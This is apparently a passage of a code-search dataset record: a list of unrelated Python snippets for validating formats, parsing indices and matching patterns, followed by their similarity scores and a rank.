else:\r\n # Didn't find this column in the list\r\n errorlista.append(f\"{self.tiposDisponiveis[_]}\")\r\n\r\n # Raising the errors, if any occurred.\r\n if len(errorlista) > 0:\r\n raise ValueError(f\"{errorlista} <- These columns are missing from format.\")\r\n\r\n # Last column has to be 'Text'\r\n if lista[9].lower() != self.tiposDisponiveis[10].lower():\r\n raise ValueError(f\"{lista[9]} last element has to be 'Text'.\")\r\n \r\n return True", "def ParseIndex(self, text):\n taxonStart = 0\n taxonStop = len(self.alignment) - 1\n columnStart = 0\n columnStop = self.alignment.get_alignment_length() - 1\n if (',' not in text):\n self.AlertMessage('Invalid index format. (taxa or columns missing)', 'high')\n return (-1,-1,-1,-1)\n else:\n text = text.strip()\n indices = text.split(',')\n if (len(indices) > 2):\n self.AlertMessage('Invalid index format. (too many fields)', 'high')\n return (-1,-1,-1,-1)\n else:\n if (':' in indices[0]): #there is a range specified in the taxon index\n taxonIndices = indices[0].split(':')\n if (taxonIndices[0]): #a start taxon is specified\n try:\n taxonStart = int(taxonIndices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (taxon start index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (taxonIndices[1]): #a stop taxon is specified\n try:\n taxonStop = int(taxonIndices[1].strip())\n except:\n self.AlertMessage('Invalid index format. 
(taxon stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n elif (indices[0]): #a single taxon is specified\n try:\n taxonStart = int(indices[0].strip())\n taxonStop = int(indices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (taxon start or stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (':' in indices[1]): #there is a range specified in the taxon index\n columnIndices = indices[1].split(':')\n if (columnIndices[0]): #a start taxon is specified\n try:\n columnStart = int(columnIndices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (column start index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (columnIndices[1]): #a stop taxon is specified\n try:\n columnStop = int(columnIndices[1].strip())\n except:\n self.AlertMessage('Invalid index format. (column stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n elif (indices[1]): #a single taxon is specified\n try:\n columnStart = int(indices[1].strip())\n columnStop = int(indices[1].strip())\n except:\n self.AlertMessage('Invalid index format. (column start or stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if ((0 <= taxonStart <= taxonStop) & (0 <= columnStart <= columnStop)):\n return (taxonStart, taxonStop, columnStart, columnStop)\n else:\n self.AlertMessage('Invalid index range. (start > stop or index < 0)', 'high')\n return (-1,-1,-1,-1)", "def isMatched(expr):\n pass", "def check_columns(self, win: list) -> bool:\r\n for row in range(self.size):\r\n column = [self.tags[x][row] for x in range(self.size)]\r\n for j in range(len(column) - len(win) + 1):\r\n if win == column[j:j+self.win_condition]:\r\n return True", "def grammar_type(rules):\n for rule in rules:\n if len(rule[0]) > len(rule[1]):\n return 0\n for rule in rules:\n if len(rule[0]) != 1 or rule[0] != rule[0].upper():\n return 1\n for rule in rules:\n if rule != (\"S\", \"L\") and \\\n (len(rule[1]) > 2 or\n (len(rule[1]) == 2 and (rule[1][0] != rule[1][0].lower() or rule[1][1] != rule[1][1].upper())) or\n (len(rule[1]) == 1 and rule[1] != rule[1].lower())):\n return 2\n return 3", "def _is_valid_content_type_format(content_type: str) -> bool:\n return (\n _is_valid_ct(content_type)\n or _is_valid_pt(content_type)\n or _is_valid_set(content_type)\n or _is_valid_list(content_type)\n or _is_valid_dict(content_type)\n or _is_valid_union(content_type)\n or _is_valid_optional(content_type)\n )", "def eh_tabuleiro(tab):\r\n if not type(tab)==tuple:\r\n return False\r\n if len(tab)==3:\r\n for linha in tab:\r\n if not type(linha)==tuple:\r\n return False\r\n if len(linha)==3:\r\n for num in linha:\r\n if not (num in [-1,0,1] and type(num)==int):\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return True", "def _valid_types(arguments, types):\n for arg in arguments:\n if type(arg) not in types:\n return False\n return True", "def _valid_types(arguments, types):\n for arg in arguments:\n if type(arg) not in types:\n return False\n return True", "def test_match_vals(self):\n f = lws.match_vals\n schema_rule = r'[a-z]*'\n assert f(schema_rule, 'abc') is True\n assert f(schema_rule, 'ABC') is False\n schema_rule = 7\n assert f(schema_rule, 7) is True\n assert f(schema_rule, 7.00) is True\n assert f(r'abc', None) is True\n assert f(lambda x: x < 10, 5) is True\n assert f(lambda x: x > 10, 9) is False", "def test_multiple_word(self):\n score = location.match_weight('weston super mare UK', ['weston super mare'])\n\n self.assertEqual(score, 1000)", "def 
isValid(text):\n return bool(re.search(r'\\b(start|stop) (look|watch|guard)ing\\b', text, re.IGNORECASE))", "def match(self, sentence) -> bool:\r\n pass", "def __input_data_ok(self, line=None):\n # valid pattern: 1407478022|www.facebook.com\n valid_pattern = re.compile(\"\\w{10}\\|\\w+\")\n if (line) and (re.match(valid_pattern, line)):\n return True\n else:\n return False", "def multiFieldsPairSearch(self, pair, sim):\n # Now search the index:\n title = pair[0].replace('_', ' ')\n content = pair[1]\n parser = MultiFieldQueryParser(\n [\"content_section\", \"title_article\"], self.analyzer)\n parser.setDefaultOperator(QueryParserBase.OR_OPERATOR)\n query1 = MultiFieldQueryParser.parse(parser, QueryParser.escape(title))\n query2 = MultiFieldQueryParser.parse(\n parser, QueryParser.escape(content))\n\n bq = BooleanQuery.Builder()\n bq.add(query1, BooleanClause.Occur.FILTER)\n bq.add(query2, BooleanClause.Occur.SHOULD)\n\n self.searcher.setSimilarity(sim)\n hits = self.searcher.search(bq.build(), 6).scoreDocs\n return hits", "def _can_handle_query(cls, *query):\n required = {a.Time, a.Instrument}\n optional = {a.Wavelength}\n all_attrs = {type(x) for x in query}\n\n ops = all_attrs - required\n # If ops is empty or equal to optional we are ok, otherwise we don't\n # match\n if ops and ops != optional:\n return False\n\n # if we get this far we have either Instrument and Time\n # or Instrument, Time and Wavelength\n for x in query:\n if isinstance(x, a.Instrument) and x.value.lower() == 'norh':\n return True\n\n return False", "def validRange(line):\n line_col = str.split(line)\n chrom = line_col[0]\n pos = line_col[1]\n# any(lower <= postcode <= upper for (lower, upper) in [(1000, 2249), (2555, 2574), ...])\n if any(float(low) <= float(pos) <= float(high) for (low,high) in TE_ranges[chrom]):\n return False\n return True", "def valid_type_in_colspan(arch, **kwargs):\n return all(\n attrib.isdigit()\n for attrib in arch.xpath('//@colspan')\n )", "def consequence_filter(line, index, consequence_list):\n consequence = re.split(r'\\t+', line.rstrip('\\t'))[index]\n if not any(variant_type in consequence for variant_type in\n consequence_list):\n return True\n else:\n return False", "def _validate_time_params(time_params):\n allowed_params = (\"Ntimes\", \"start_time\", \"integration_time\", \"time_array\")\n if time_params.get(\"time_array\", None) is not None:\n return True\n elif all(time_params.get(param, None) is not None for param in allowed_params[:-1]):\n # Technically, start_time doesn't need to be specified, since it has a\n # default setting in io.py, but that might not be set in stone.\n return True\n else:\n return False", "def checkStructure(self, result, resultType):\n res = True\n if resultType:\n try:\n structure = json.loads(resultType)\n result_structure = self.getStructure(result)\n res = structure[\"type\"] == result_structure[\"type\"] and all(elem in list(result_structure[\"columns\"])\n for elem in list(structure[\"columns\"])) and all(elem in list(result_structure[\"indexes\"])\n for elem in list(structure[\"indexes\"]))\n except Exception as ex:\n print(f\"Error checking structure: {ex}\")\n\n return res", "def check_match(possible_match):\n top = \"\"\n bottom = \"\"\n for tup in possible_match:\n top += tup[0]\n bottom += tup[1]\n return top == bottom", "def match(self, digit: int) -> bool:\n return any(_range.match(digit) for _range in self.ranges)" ]
[ "0.65751725", "0.56603086", "0.557421", "0.5525039", "0.54756975", "0.5400486", "0.53058875", "0.52834386", "0.5266304", "0.5260166", "0.5238574", "0.5214264", "0.5185073", "0.51797396", "0.51623565", "0.5152065", "0.5134428", "0.5108154", "0.5108154", "0.51043475", "0.5099916", "0.5099904", "0.5077996", "0.50713813", "0.50662524", "0.5049845", "0.5047419", "0.50461596", "0.5033521", "0.5026133", "0.5022566", "0.50074893", "0.50037915", "0.500257", "0.49939445", "0.49858096", "0.4985794", "0.49852213", "0.4984102", "0.4973671", "0.4948205", "0.4944568", "0.4922287", "0.49160787", "0.4908858", "0.48978627", "0.4896227", "0.48935732", "0.4891425", "0.48886833", "0.48868525", "0.48789686", "0.4878842", "0.48737213", "0.48729736", "0.4872293", "0.4872293", "0.48642015", "0.4858499", "0.48576236", "0.48574552", "0.485586", "0.48540843", "0.48494995", "0.4839469", "0.48357302", "0.4825301", "0.48192665", "0.48166043", "0.4812888", "0.4812746", "0.48103774", "0.48073503", "0.48017025", "0.48013481", "0.47963572", "0.47865295", "0.47825485", "0.47755718", "0.47716329", "0.47716218", "0.47669345", "0.47649232", "0.4760222", "0.47583234", "0.47583234", "0.4757785", "0.47548702", "0.4742185", "0.47400045", "0.4735029", "0.47346842", "0.4727534", "0.4726323", "0.47247902", "0.47204542", "0.472013", "0.47198048", "0.47159383", "0.46993914" ]
0.62283635
1
Run the unit tests.
def test():
    import unittest
    tests = unittest.TestLoader().discover('tests')
    unittest.TextTestRunner(verbosity=2).run(tests)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def runTests(self):\n \n pass", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def main():\n run_test_all()", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests():", "def test():\n import unittest\n tests = unittest \n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runtest(self):", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests=unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def __main() :\n launchTests()", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def unitary_test():", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def test():\n loader = unittest.TestLoader()\n suite = loader.discover(os.path.dirname(__file__))\n runner = unittest.TextTestRunner()\n runner.run(suite)", "def run_tests(self):\n raise NotImplementedError", "def main():\n fix_sys_path()\n result = unittest.TextTestRunner(verbosity=2).run(createTestSuite())\n\n if result.testsRun != EXPECTED_TEST_COUNT:\n raise Exception(\n 'Expected %s tests to be run, not %s.' 
% (EXPECTED_TEST_COUNT, result.testsRun))\n\n if len(result.errors) != 0 or len(result.failures) != 0:\n raise Exception(\n \"Functional test suite failed: %s errors, %s failures of %s tests run.\" % (\n len(result.errors), len(result.failures), result.testsRun))", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def test():\n import unittest\n import tests\n tests = unittest.TestLoader().discover('tests', pattern='*tests.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def runTest(self):\r\n self.setUp()", "def main():\n vunit = vunit_pkg.VUnit.from_argv()\n vunit = map_sources(vunit)\n run_tests(vunit)", "def run_main(): # pragma: no cover\n RunTestsCLI.run()", "def runalltests():\n doctest.testmod()", "def test_script(self) -> None:\n main()", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! You passed all the game test cases.\")", "def runTest(self):\n self.setUp()\n self.test_FiducialTransform1()", "def run_test(self):\n raise NotImplementedError", "def test():\n tests = unittest.TestLoader().discover('project/tests', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n sys.exit(result)", "def test():\r\n import unittest \r\n tests = unittest.TestLoader().discover('tests_sql') \r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n self.setUp()\n self.test_FiberDistance1()", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_basic_execution(self):", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def run_tests():\n test_command = \"pytest -s \" + os.path.join(root_path, \"cases\", \"test_cases.py::TestCases::test_cases\") + \" --html=\" + os.path.join(root_path, \"reports\", 
\"qa_testing_report.html\")\n\n subprocess.run(test_command, shell=True)", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'functional',\n 'manifest.ini')\n TestRun.run_tests(self)", "def runTest(self):\n self.setUp()\n self.test_modul1()", "def runTest(self):\n self.setUp()\n self.test_STLModelBuilder1()", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def runTest(self):\n self.setUp()\n self.test_NeuroPath1()", "def startTestRun(self):", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def runTest(self):\n self.setUp()\n self.test_visuThreeD1()", "def test(cline):\n print(\"Running unit tests.\")\n cline.run(\"TF_CPP_MIN_LOG_LEVEL=3 python3 -m unittest\")", "def test(self):\n pass", "def test_main():\n # Setup\n # Exercise\n # Verify", "def runTest(self):\n self.setUp()\n self.test_ProstateReporting1()", "def test():\n nose.run()", "def tests():\n api.local('nosetests')", "def main():\n try:\n unittest.main(testLoader=BetterLoader(), defaultTest='suite')\n except Exception:\n import sys\n import traceback\n traceback.print_exc()\n sys.exit(1)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in [t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def setUp(self):\n MainTests.setUp(self)", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def unittest():\n from a6test import test_all\n test_all()", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def main():\n unittest.main(exit=False, verbosity=2)\n return 0", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runTest(self):\n self.setUp()\n self.test_JupyterNotebooks1()", "def runTest(self):\r\n self.setUp()\r\n 
self.test_sceneImport24281()", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def run(self, test, env):\n\n raise NotImplementedError", "def runTest(self):\n self.setUp()\n self.test_SegmentEditor1()", "def _run_unittest(tests, verbose, use_gdb, gtest_filter, gtest_list_tests):\n failed_tests = []\n unfound_tests = []\n for test in tests:\n index = 1\n while True:\n test_info = _read_test_info('%s.%d.json' % (test, index))\n if not test_info:\n # The format of test info file is [test name].[index].json, where index\n # is one of consecutive numbers from 1. If the test info file for index\n # 1 is not found, that means the corresponding test does not exist.\n if index == 1:\n unfound_tests.append(test)\n break\n command = _construct_command(test_info, gtest_filter, gtest_list_tests)\n if verbose:\n print 'Running:', command\n args = shlex.split(command)\n if use_gdb:\n unittest_util.run_gdb(args)\n else:\n returncode = subprocess.call(args)\n if returncode != 0:\n print 'FAILED: ' + test\n failed_tests.append('%s.%d' % (test, index))\n index += 1\n if unfound_tests:\n print 'The following tests were not found: \\n' + '\\n'.join(unfound_tests)\n if failed_tests:\n print 'The following tests failed: \\n' + '\\n'.join(failed_tests)\n if unfound_tests or failed_tests:\n return -1\n return 0", "def run_tests():\n\n parser = argparse.ArgumentParser(description=\"Run tests for the T2K Data Manager.\")\n parser.add_argument(\n \"-w\", \"--write\", action=\"store_true\", help=\"do write tests. Default: read only\"\n )\n parser.add_argument(\n \"-t\",\n \"--tape\",\n action=\"store_true\",\n help=\"do write tape storage tests. Default: disks only\",\n )\n parser.add_argument(\n \"-p\",\n \"--parallel\",\n default=2,\n type=int,\n help=\"specify how many parallel processes to test. Defaul: 2\",\n )\n parser.add_argument(\n \"-b\", \"--backend\", default=None, help=\"specify which backend to use\"\n )\n\n args = parser.parse_args()\n if args.backend is not None:\n dm.config.backend = args.backend\n dm.backend = backends.get_backend(dm.config)\n\n run_read_only_tests(tape=args.tape, parallel=args.parallel)\n if args.write:\n run_read_write_tests(tape=args.tape, parallel=args.parallel)\n\n print_(\"All done.\")", "def test():\n for cmd in [\n \"pytest --verbose --cov pike/ --cov-report term --cov-report html tests/\",\n ]:\n _run_in_venv(shlex.split(cmd))\n for linter in [[\"black\", \"--check\"], [\"flake8\"], [\"isort\", \"--check\"]]:\n _run_in_venv(linter + TEST_FILES)\n\n _run_in_venv(\n [\"mypy\", \"pike/\", \"tests/\", \"setup.py\", \"pikefile.py\", \"--show-error-codes\"]\n )\n _run_in_venv([\"mypy\", \"examples/\"])\n _run_in_venv([\"bandit\", \"-r\", \"pike/\"])", "def runTest(self):\n self.setUp()\n self.test_SegmentDicom1()", "def runTest(self):\r\n self.setUp()\r\n self.test_SegmentEditor1()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass" ]
[ "0.85183024", "0.82517105", "0.81414855", "0.8076668", "0.8069847", "0.80517304", "0.8050559", "0.801922", "0.7989364", "0.7988354", "0.79849315", "0.7968269", "0.7955071", "0.7955071", "0.79471713", "0.79471713", "0.79471713", "0.7850217", "0.7809605", "0.7801223", "0.7774706", "0.7701633", "0.76810014", "0.7662626", "0.765403", "0.75881755", "0.75657576", "0.75001276", "0.7491264", "0.7463525", "0.7394416", "0.73718035", "0.7367032", "0.7351095", "0.7327775", "0.7324071", "0.7316174", "0.7316133", "0.73124266", "0.7310003", "0.7308142", "0.72903705", "0.72761583", "0.72559726", "0.72417206", "0.72323096", "0.72318786", "0.7229984", "0.7222241", "0.7216678", "0.7198819", "0.7198289", "0.71759677", "0.7172629", "0.71718615", "0.7156905", "0.71532303", "0.71375525", "0.7126207", "0.7116378", "0.7112115", "0.7104717", "0.71044695", "0.7091796", "0.70854384", "0.70835596", "0.70793", "0.707824", "0.70768106", "0.70767236", "0.70722055", "0.70459664", "0.7033137", "0.7031282", "0.7030975", "0.7026528", "0.701949", "0.7013642", "0.7009026", "0.7004702", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396" ]
0.7952072
22
Processor pool entry point. Responsible for processing and writing one event from the message bus
def process_event(event_processor, event):
    log = logging.getLogger(__name__)
    try:
        log.debug("Processing Event: %s - %s" % (event["content_type"], event["routing_key"]))
        event_processor.process_event(event["content_type"], event["routing_key"], event["body"])
    except:
        log.exception("Unable to process event")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, event):\n pass", "def event_queue_proc(self,event):\r\n event()", "def process_event(self, event):\r\n pass", "def process_amqp_events(self):\n self.connection.process_data_events()", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def run(self):\n self.class_inst_obj.processor(self.msg)", "def process():", "async def proccess_message(self, *args):\n\n await self.used_middlewares[0].compute(*args)", "def run(self):\n\n self.debug = self.forwarder_options.get(\"debug\", \"0\") != \"0\"\n if self.debug:\n self.logger.setLevel(logging.DEBUG)\n\n processor_count = int(self.forwarder_options.get(\"message_processor_count\", 1))\n cpu_count = multiprocessing.cpu_count()\n if processor_count > cpu_count:\n self.logger.info(\"processor_count (%s) > cpu_count. Defaulting to cpu_count\", (processor_count, cpu_count))\n processor_count = cpu_count\n\n self.event_processor = EventProcessor(self.forwarder_options)\n self.processor_pool = multiprocessing.Pool(processor_count)\n\n while True:\n try:\n self.consume_message_bus(test=self.testing)\n except Exception as e:\n self.retry_attempts += 1\n if self.retry_attempts > self.max_retry_attempts:\n self.logger.critical(\"Too many attempts to reconnect (%d). Exiting now.\" % self.max_retry_attempts)\n break\n\n if isinstance(e, pika.exceptions.AMQPConnectionError) or isinstance(e, pika.exceptions.ConnectionClosed):\n self.logger.error(\"Connection is closed or refused, retrying in %s seconds\" % self.retry_interval)\n else:\n self.logger.exception(\"An unexpected error occurred, retrying in %s seconds\" % self.retry_interval)\n\n if self.connection is not None:\n self.connection.close()\n self.connection = None\n\n time.sleep(self.retry_interval)", "def process_messages(self):\n pass", "def processMessage(self, *args, **kwargs):\r\n pass", "def process(self):\n pass", "def handle_event(self, ev):\n msg = (\"Handling event '%s' \" % (ev.id))\n LOG.info(msg)\n try:\n msg = (\"Worker process with ID: %s starting \"\n \"to handle task: %s of topic: %s. \"\n % (os.getpid(), ev.id, lb_const.LBAAS_AGENT_RPC_TOPIC))\n LOG.debug(msg)\n\n method = getattr(self, \"_%s\" % (ev.id.lower()))\n method(ev)\n except Exception as err:\n msg = (\"Failed to perform the operation: %s. 
%s\"\n % (ev.id, str(err).capitalize()))\n LOG.error(msg)\n finally:\n if ev.id == lb_const.EVENT_COLLECT_STATS_V2:\n \"\"\"Do not say event done for collect stats as it is\n to be executed forever\n \"\"\"\n pass\n else:\n msg = (\"Calling event done for event '%s' \" % (ev.id))\n LOG.info(msg)\n self.sc.event_complete(ev)", "def process(self, message: Message, **kwargs: Any) -> None:", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "def process_msg(msg):\n time.sleep(random.randint(2, 10))\n print \"processor|%s::Processed message: %s\" % (UID, msg.body)", "def process():\n pass", "def process(self):", "def process(self):", "def process(self):", "def process_thread(self):", "def main_task_handler():\n context = zmq.Context()\n\n # socket to sending messages to save\n save_sender = context.socket(zmq.PUSH)\n save_sender.connect(SAVE_PUSH_QUEUE_ADDR)\n\n c = 0\n while (True):\n # simulate some very complex computation\n (x, y) = (random.gauss(0, 1), random.gauss(0, 1))\n result = { 'unit': computer_id, 'counter': c, 'x' : x, 'y': y}\n\n # send message to sender\n save_sender.send_json(result)\n\n # take it easy\n time.sleep(1)\n\n c += 1", "def process(self) -> List['Event']:\n raise NotImplementedError", "def process(self, message=None):\n\n while self.running:\n message = self.channel.basic.get(self.queue)\n if message:\n content = message.body\n\n # log message\n if self.debug:\n self.log(\"Recieved: \" + str(content))\n\n # send to child nodes\n self.scatter(Message(**self.parse(content)))\n else:\n # yield to other greenlet\n # self.tick()\n self.sleep(1)", "def process(self):\n raise NotImplementedError", "def send_messages(self):\n if self.messages:\n messages, self.messages = self.messages, []\n self.mpub(\"events.%s\" % config.pool, messages)", "def publishEvent(eventName,publisher, msg):", "def __call__(self, event, payload):\n logging.debug(\"Event: %s %s\" % (event, payload))\n\n # register new task\n if event == \"CRAB_Cmd_Mgr:NewTask\":\n self.newTaskRegistration(payload)\n elif event == \"KillTask\":\n taskUniqName, cmdRng = payload.split(':')\n self.killingRequestes[taskUniqName] = cmdRng\n # usual stuff\n elif event == \"TaskRegisterComponent:StartDebug\":\n logging.getLogger().setLevel(logging.DEBUG)\n elif event == \"TaskRegisterComponent:EndDebug\":\n logging.getLogger().setLevel(logging.INFO)\n elif event == \"TaskRegisterComponent:HeartBeat\":\n logging.info(\"HeartBeat: I'm alive \")\n self.ms.publish(\"TaskRegisterComponent:HeartBeat\",\"\",self.HeartBeatDelay)\n self.ms.commit()\n else:\n logging.info('Unknown message received %s + %s'%(event,payload))\n return True", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. 
This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), 